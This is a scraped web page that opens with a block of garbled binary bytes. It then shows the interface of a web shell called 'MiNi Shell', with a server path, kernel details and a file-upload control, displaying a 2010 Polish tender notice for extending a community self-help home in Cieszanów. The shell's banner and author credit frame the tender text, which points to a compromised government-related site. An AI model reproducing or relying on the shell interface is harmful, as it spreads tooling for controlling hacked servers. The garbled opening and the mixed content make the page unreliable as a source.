JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100427/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100427/100123-N-2010.html

<p class="kh_header"><b>Cieszanów: Rozbudowa Środowiskowego Domu Samopomocy w Cieszanowie</b><br>
<b>Numer ogłoszenia: 100123 - 2010; data zamieszczenia: 27.04.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Cieszanów , ul. Rynek 1, 37-611 Cieszanów, woj. podkarpackie, tel. 016 6311076, faks 016 6311440.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.przetargi.cieszanow.eu</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Rozbudowa Środowiskowego Domu Samopomocy w Cieszanowie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> W ramach rozbudowy Środowiskowego Domu Samopomocy w Cieszanowie przewiduje się roboty budowlane w istniejącym budynku wolno stojącym. Zakres prac budowlanych obejmuje parterową dobudowę części istniejącej. Dach o konstrukcji stalowej przeszklonej nad dziedzińcem. Pozostały dach jednospadowy.  
Docelowe parametry obiektu:
-	powierzchnia zabudowy po rozbudowie - 937,00 m2
-	powierzchnia użytkowa po rozbudowie - 803,54 m2 
-	kubatura po rozbudowie - 3 998,00 m3.
Program funkcjonalno - użytkowy części dobudowanej o łącznej pow. 474,44 m2: 
-	rekreacja - 309,22 m2, 
-	pracownia stolarska - 50,31 m2, 
-	pracownia garncarska - 50,24 m2, 
-	rehabilitacja - 42,73 m2, 
-	węzeł sanitarny - 13,54 m2, 
-	wiatrołap - 8,4 m2.

Technologia wykonania dobudowywanej części:
-	Fundamenty - ławy i stopy fundamentowe żelbetowe z betonu żwirowego  B 20, ławy i ściany fundamentowe zakończone izolacją poziomą przeciwwilgociową 2 x papa na lepiku DYSPERBIT lub równoważnej technologii. 
-	Ściany fundamentowe - z betonu żwirowego  B 20 gr. 24 cm ocieplone styropianem M30 gr. 8 cm na STYROLEPIKU lub równoważnej technologii.
-	Ściany nadziemia - z bloczków z betonu komórkowego odm. 400 na zaprawie klejowej.
-	Kominy wentylacyjne - z cegły ceramicznej pełnej 10 MPa, na zaprawie cem. wap. 5,0 MPa, ponad dachem kominy z cegły klinkierowej na zaprawie grafitowej.
-	Stropy - gęsto żebrowane ceramiczno-żelbetowe POROTHERM 62,5 lub równoważnej technologii. 
-	Konstrukcja stalowa - z profili walcowanych, spawano-skręcana zabezpieczony farbami antykorozyjnymi i p. poż.,  szklenie szkłem fasadowym gr. 10 mm w kolorze błękitnym.
-	Dach - jednospadowy drewniany pokryty blachą trapezową powlekaną T-22, rynny i rury spustowe PCV.
-	Ścianki działowe - w istniejącym pomieszczeniu rękodzielnictwa likwiduje się ściankę działową i projektuje ściankę oddzielającą korytarz ewakuacyjny z profili stalowych gr. 10 cm, obitych obustronnie płytami GK p. poż. gr. 2 x 12,5 mm, ściana wyciszona wełną mineralną gr. 10 cm, ścianki w węźle sanitarnym na rusztach metalowych gr. 5 cm obite obustronnie poj. płytami GK wodoodpornymi, wyciszonymi wełną min. gr. 5 cm.
-	Stolarka - okna i drzwi zewnętrzne OB typowe PCV, drzwi wewnętrzne drewniane płycinowe, drzwi główne zewnętrzne i w wiatrołapie AL rozsuwane automatycznie z blokadą skrzydeł drzwiowych w stanie rozwartym w przypadku pożaru.  
-	Wiatrołap - o konstrukcji aluminiowej, przeszklony z otworem drzwiowym 200 x 200 cm do montażu drzwi rozsuwanych.
-	Posadzki - z płytek terakotowych antypoślizgowych na podłożach betonowych ocieplanych.
-	Tynki wewnętrzne - gipsowe, maszynowe, w pomieszczeniach rekreacji do wys. 2 m tynk mozaikowy drobnoziarnisty, węźle sanitarnym i w pozostałych pomieszczeniach za przyborami sanitarnymi ściany do wys. 2 m wykładane płytkami glazurowymi, pozostałe tynki ścian i sufitów malowane farbą krzemianową.
-	Tynki zewnętrzne - nowe cem. wap. gładkie, istniejące docieplone styropianem gr. 10 cm z przygotowaniem pod malowanie. Na cokole o wys. 50 cm płytki ceramiczne klinkierowe 6,5x25 cm na zaprawie grafitowej, elewacja malowana farbami krzemianowymi fasadowymi.
-	Instalacja wodociągowa - (zimnej i ciepłej wody) - z rur stalowych ocynkowanych fi 15, fi 20 i fi 25 mm, poł. na gwint, prowadzonych w bruzdach, izolowane otuliną gr. 9 mm, do grzania wody projektowane podgrzewacze pojemnościowe elektryczne podłogowe o poj. 10 l - 3 szt. i o poj. 5 l - 2 szt.
-	Instalacja kanalizacji sanitarnej - z rur PCV fi 110, fi 75, fi 50 mm, ciąg główny i podejścia pod muszle  fi 110, pod kratki ściekowe fi 110 i fi 50, pod umywalki fi 50, rury kielichowe łączone na wcisk,  łapacz błota z rury PCV fi 106x3 cm ustawionej na fundamencie z betonu kl. B 20 przykryty włazem żeliwnym fi 60 cm.
-	Instalacja centralnego ogrzewania - grzejniki płytowe z wbudowanym zaworem termostatycznym, zasilane od dołu, o wysokości 300 - 600 mm i dł. dobranej w zależności od zapotrzebowania, połączone rurami miedzianymi, kocioł CO o mocy 90 kW sterowany automatycznie, instalacja wentylacyjna pomieszczeń sanitarnych i rekreacji. 
-	Instalacja elektryczna - przebudowa linii napowietrznej n/n na linię kablową o dł. 83,1 m, wykonanie instalacji w budynku z rozdzielniami i przyłączem 5x16 mm2, wejścia budynku zastosowane oprawy kierunkowe na ścianie front., oświetlenie wewnętrzne świetlówkowe. Instalacja oświetlenia przewody DY 1,5 mm2  p/t, w oświetleniu moduły awaryjne. Instalacja gniazd wtykowych przewodowych 3xDY 2,5 mm2, ochrona przepięciowa (np. SPN 315 BC), przeciwporażeniowa (wył. różnicowoprądowy np. P302-40-30-AC) i ochronę przed dotykiem pośrednim (wył. nadmiarowoprądowy np. S302). 
-	Podjazd dla osób niepełnosprawnych - od furtki do drzwi wejściowych do obiektu projektuje się podjazd dla wózków inwalidzkich.
-	Ogrodzenie - uzupełnienie ogrodzenia z przęseł stal. na dł. 148 m na słupkach 38x38cm klinkierowych.
Ponadto w związku z rozbudową ŚDS przewidziano zakup:
-	sprzętu (rekreacyjny i rehabilitacyjny), w tym: 
1)	stół tenisowy, 
2)	bilard rekreacyjny, 
3)	szafka na sprzęt tenisa i bilardu, 
4)	fotele wypoczynkowe (10 szt).,
5)	pompka wodna elektryczna, 
6)	drabinka gimnastyczna (2 szt.),  
-	wyposażenia (warsztaty terapii zajęciowej, sprzęt medyczny i rehabilitacyjny), w tym:
1)	tokarka do drewna, 
2)	strugarko-wyrówniarko-grubościówka, 
3)	piła tarczowa, 
4)	pochłaniacz wiórów, 
5)	piła taśmowa, 
6)	szlifierka, 
7)	stół montażowy,
8)	taboret warsztatowy (12 szt.), 
9)	regał na materiały i wyroby gotowe, 
10)	wiertarka stołowa (2 szt.), 
11)	szafka podumywalkowa (2 szt.), 
12)	wieszaki ścienne (6 szt.), 
13)	kosz na śmieci 20 l (5 szt.), 
14)	koła garncarskie (2 szt.), 
15)	stoły garncarskie (4 szt.), 
16)	regał wyrobów gotowych, 
17)	regał na materiały i sprzęt, 
18)	szafka pod umywalkę i zlew, 
19)	kozetka lekarska, 
20)	szafka lekarska, 
21)	lampa SOLUX (laser), 
22)	magnetronik, 
23)	pulsotronic, 
24)	parawany ruchome (5 szt.), 
25)	taboret lekarski..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.21.00.00-2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.07.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>2.	W celu wykazania że wykonawca posiada wiedze i doświadczenie w realizacji zamówień przedkłada wykaz  wykonanych robót budowlanych w  okresie  ostatnich  pięciu lat  przed  wszczęciem niniejszego postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, odpowiadających swoim rodzajem i wartością robotom budowlanym  stanowiącym przedmiot zamówienia, z podaniem ich wartości oraz daty i miejsca wykonania wraz z dokumentami potwierdzającymi, że roboty te zostały wykonane należycie, stanowiący załącznik nr 7, (przynajmniej dwie roboty budowlane o wartości równej wartości robót budowlanych zawartych w ofercie.)</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>4.	W celu wykazania że wykonawca dysponuje potencjałem technicznym niezbędnym do realizacji zamówienia przedkłada wykaz posiadanego sprzętu i wyposażenia technicznego przewidzianego do użycia przy  realizacji zamówienia - wzór stanowi załącznik nr 4</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>3.	W celu wykazania że wykonawca dysponuje osobami zdolnymi do wykonania zamówienia przedstawia wykaz osób uczestniczących w realizacji przedmiotu zamówienia wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia niezbędnego do wykonania zamówienia oraz zakresu wykonywanych przez nich czynności - załącznik nr 3 do SIWZ.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Zmiana postanowień zawartej umowy w stosunku do treści oferty na podstawie której dokonano wyboru wykonawcy może nastąpić w zakresie:
zmiana terminu (może nastąpić wówczas gdyby nastąpiły okoliczności nie przewidziane w trakcie zawierania umowy nie wynikające z winy żadnej ze stron np. klęska żywiołowa, ulewne deszcze, długotrwałe braki energii elektrycznej itp.)
zmiana materiałów (może nastąpić tylko wówczas gdy materiały wykorzystane do wykonania przedmiotu zamówienia będą takiej samej jakości jak zaproponowane w ofercie bądź lepsze.)
zmiana technologii wykonania (może nastąpić wówczas gdy zastosowana technologia będzie równoważna lub lepsza od zaproponowanej w ofercie.)</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.przetargi.cieszanow.eu<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Gmina Cieszanów 
ul. Rynek 1 
37-611 Cieszanów.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.05.2010 godzina 09:00, miejsce: Urząd Miasta i Gminy Cieszanów
ul. Rynek 1 
37-611 Cieszanów.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Regionalny Program Operacyjny Województwa Podkarpackiego 2007-2013
Priorytet V:  Infrastruktura publiczna
5.2 Infrastruktura ochrony zdrowia i pomocy społecznej Schemat B.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com